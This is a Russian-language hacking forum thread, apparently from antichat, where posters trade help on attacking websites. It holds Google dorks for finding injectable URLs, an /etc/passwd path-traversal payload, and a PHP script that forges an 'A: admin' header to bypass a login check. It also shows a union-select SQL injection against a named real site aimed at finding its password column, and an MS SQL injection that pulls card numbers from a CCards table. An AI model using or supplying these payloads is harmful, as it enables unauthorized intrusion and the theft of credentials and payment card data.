Ваши вопросы по уязвимостям.

не то или я не умею

 

нужен аналог софтины Netdevilz sql ScanneR, которая сканит, а потом и парсит уязвимые урлы. Работает через гугл, такие запросы, как inurl:forum.php?id= site:.ru
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=

и т.д.

 

Во первых - нету такого файла pass, есть файл passwd

Проблема в magic_quotes.

Пример для Unix сервера:

Code:

site.ru/modules.php?name=../../../../../../../etc/passwd//////////////////[..4095..]

4095 - это минимальное количество слешей.

Но подобный способ довольно таки редко получается провести.

 

тоесть sql helper 2.7, Pangolin etc...?

 

[Feldmarschall],

нет конечно.

Эти программы для тупых и для ленивых! Мне не нужно, чтобы за меня делали мою работу. Мне нужен материал, с каким нужно работать.

 

нет смысла инклюдить /etc/passwd - там же написано, что open_basedir врублен.

 

Всем привет,
есть в общем скрипт авторизации,
исходник примерно такой:
if( @$_SERVER['HTTP_A'] != 'admin') {header("Location: notauth.php");exit;}

Что мне надо сделать чтобы в суперглобальном массиве $_SERVER['HTTP_A'] было значение 'admin', или как мне пройти авторизацию?
буду очень благодарен за любые подсказки,

 

послать заголовок A=admin

 

http://slil.ru/28959824
пасс: antichat

 

Redwood
скинь сюда название, полное

 

SQLi/XSS/LFI/RFI Exploit Scanner

 

решено,
спасибо огромное!!!

 

Просто "A"

 

надо не HTTP_A, а A.


вот на php пример

PHP:

echo get('www.entropy.ch', '/software/MacOSX/php/test.php', 'http://google.com/', 'firefox', '');
function get($hostname, $path, $ref, $ua, $cook)
{
    $line="";
    $fp=fsockopen($hostname, 80, $errno, $errstr, 60);
    
        if(!$fp) echo $errstr($errno);
            else
            {
                $headers = "GET $path HTTP/1.1\r\n";
                $headers .="Host: $hostname\r\n";
                $headers .="User-Agent: $ua\r\n";
                $headers .= "Accept-Language: en,en-US;q=0.9,en;q=0.8\r\n";
                $headers .= "Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\n";
                $headers .="Cookie: $cook\r\n";
                $headers .="A: admin\r\n";
                $headers .="Connection: Close\r\n";
                $headers .="Referer: $ref\r\n\r\n";
                
                fwrite($fp, $headers);
                

                    while(!feof($fp)){
                            
                        $line .= fgets($fp, 1024);
                    }
                
                fclose($fp);
            }

    return $line;
}

 

http://www.kino.ru/forum.php?id=-2274+union+select+1,2,3--
помогите найти столбец паролей. Нашел мыла, логины, пароли найти не могу.
Версия: 4

 

Ну я показал пример самого способа ( хот и не очень удачный, так как не учел условия для выхода за пределы каталога ).

 

эмм...
вот такая проблема
MS SQL /Version:
Microsoft SQL Server 2000 - 8.00.194 (Intel X86)
Aug 6 2000 00:57:48
Copyright (c) 1988-2000 Microsoft Corporation
Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)

когда делаю вот такой запрос:
1'+or+1=(select+top+1+CardNumber+from+CCards)--
и в ответ

hex,aes_encrypt(aes_.. не идут

Original

остольные columns все идут..

 

не пашет такое
site.ru/modules.php?name=../../../../../../../etc/passwd//////////////////[..4095..]
.................что можно провести еще?

 

причем сдесь это ??
мне что version нужно узнать? ты повнимательней почитай мой пост, прежде чем отвечать то что я сам знаю..


и convert не идет там

 

не с convert все также